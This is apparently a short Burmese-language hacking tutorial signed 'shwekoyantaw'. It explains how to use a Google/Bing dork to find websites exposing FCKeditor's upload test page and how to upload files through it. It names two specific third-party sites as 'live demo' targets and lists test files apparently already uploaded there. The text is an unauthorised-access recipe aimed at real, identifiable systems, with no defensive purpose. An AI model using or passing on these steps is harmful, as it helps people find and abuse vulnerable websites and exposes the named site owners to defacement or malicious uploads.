Google and Bing Dork: intitle:"FCKeditor - Uploaders Tests"
Exploit : http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
ပထမဆံုး Goole Dork ကိုရိုက္ထည့္ပါ။
Dork: intitle:"FCKeditor - Uploaders Tests"
အဲဒါျပီးရင္ FCK editor upload option ကိုရလိမ့္မယ္။
ေဖာ္ျပပါ Exploit အတိုင္း၀င္လိုက္ပါ။
http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html
ျပီးရင္ .txt ဖိုင္တစ္ခုတင္ႏိုင္ျပီ။တစ္ခ်ိဳ႕ဆိုက္ေတြက .html .jpg ဖိုင္ေတြပါတင္ႏိုင္တယ္။
တကယ္လို႕သင္တင္တဲ့ဖိုင္ တကယ္ရတယ္ဆိုရင္ File uploaded with no errors ဆိုျပီးေပၚလာလိမ့္တယ္။
result:
http://www.website.domain/userfiles/yourfilehere or http://www.website.domain/path/userfiles/yourfilehere
အတိုင္းသြားလိုက္ပါ။
Live Demo
http://www.relationshiptrends.com/affiliate/fckeditor/editor/filemanager/connectors/uploadtest.html
http://minisite.nku.edu.tr/fckeditor/editor/filemanager/connectors/uploadtest.html
Result
http://www.relationshiptrends.com/affiliate/img/aaaa.txt
http://minisite.nku.edu.tr//userfiles/aaaa.txt
good luck;;;;;;;;;;;
shwekoyantaw